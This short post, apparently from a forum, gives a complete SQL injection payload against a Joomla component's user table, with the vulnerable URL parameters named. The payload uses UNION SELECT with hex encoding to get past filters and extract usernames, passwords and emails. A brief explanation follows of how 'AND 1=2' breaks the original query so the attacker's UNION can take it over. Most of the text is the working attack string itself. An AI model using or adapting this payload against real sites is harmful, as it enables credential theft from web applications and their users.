and 1=2 union select 0,unhex(hex(concat(0x5e5e5e,group_concat(username,0x5e,password2,0x5e,email),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from (select * from (select * from jos_users where password2!=0x6531306164633339343962613539616262653536653035376632306638383365 order by 1 limit 139590,10)t order by 1 desc)t--
It was url decoded, mostly used for some filter bypassing an just to deliver a good syntax, ?Itemid=70&option=com_m4f_stories&view=story&id=11976 are the url parameters, and the rest is the sql injection, what it does, it breaks the original mysql query by using AND 1=2, that always returns false. so the query fails, and u can start taking over the old query by the union select statement.